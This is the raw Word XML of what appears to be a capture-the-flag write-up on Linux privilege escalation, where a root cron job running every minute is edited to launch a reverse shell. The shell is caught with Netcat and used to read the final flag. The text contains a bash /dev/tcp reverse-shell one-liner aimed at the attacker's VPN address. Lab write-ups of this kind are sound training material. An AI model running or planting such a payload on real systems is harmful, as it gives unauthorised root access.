        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user cronjob, this file is configured to be executed every </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 minute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3"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edit this file and insert our reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">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te53skoqw5z" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</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8B">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/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/1337 0&gt;&amp;1</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0"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saving, we will open the Netcat listener to receive the connection.</w:t>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69"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wait 1 minute, which is the execution time configured in the cron job.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, now we simply read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">final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1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1930400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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3">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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7" name="image15.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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94">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95">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7.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image7.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Lion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18.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7.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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6.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-unix/privilege-escalation" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/tree/master/linPEA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2.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lion.bakcup.sh/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><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3kI5LXYRSnS107WZOMiRiwLvRQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjM4bTE3MDczYnVlNTIOaC4ybzc4c2ZzaGoxZWMyDWgucnlmMXB2dThpMmsyDmguY2lxc29kYmt2bHFwMg5oLmQ5dzJtNHZ5b2xxbTIOaC4zcTNkcThqeHgzNDkyDmguNXN4bWRldmxzdW85Mg5oLjc0aWRjeTluNDMzbzIOaC5qcGltN3VnNGRhazQyDmguZXlkajkyczN4ejkwMg5oLnhtb3E3OXByZ2FmeTIOaC44azV3ZDRrank1NngyDmgud2dkbmltNWowOWh4Mg5oLjJjOHc2dmU4MHp4MTINaC50ZTUzc2tvcXc1ejIOaC4xNzVmNWNzOTR6MG84AHIhMW51YndUNlVVdmlnRnJWNVFCakx4d3hlVDEtRWU2Sk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